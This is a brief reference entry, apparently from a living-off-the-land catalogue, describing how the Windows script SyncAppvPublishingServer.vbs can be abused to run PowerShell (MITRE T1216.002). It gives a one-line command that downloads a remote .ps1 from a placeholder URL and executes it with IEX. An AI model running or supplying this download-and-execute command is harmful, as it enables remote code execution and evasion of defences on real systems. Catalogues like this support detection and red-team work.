Syncappvpublishingserver.vbs

Script used related to app-v and publishing server

Execute

Use Powershell host invoked from vbs script

SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX"

Inject PowerShell script code with the provided arguments — MITRE: T1216.002 — Privileges: User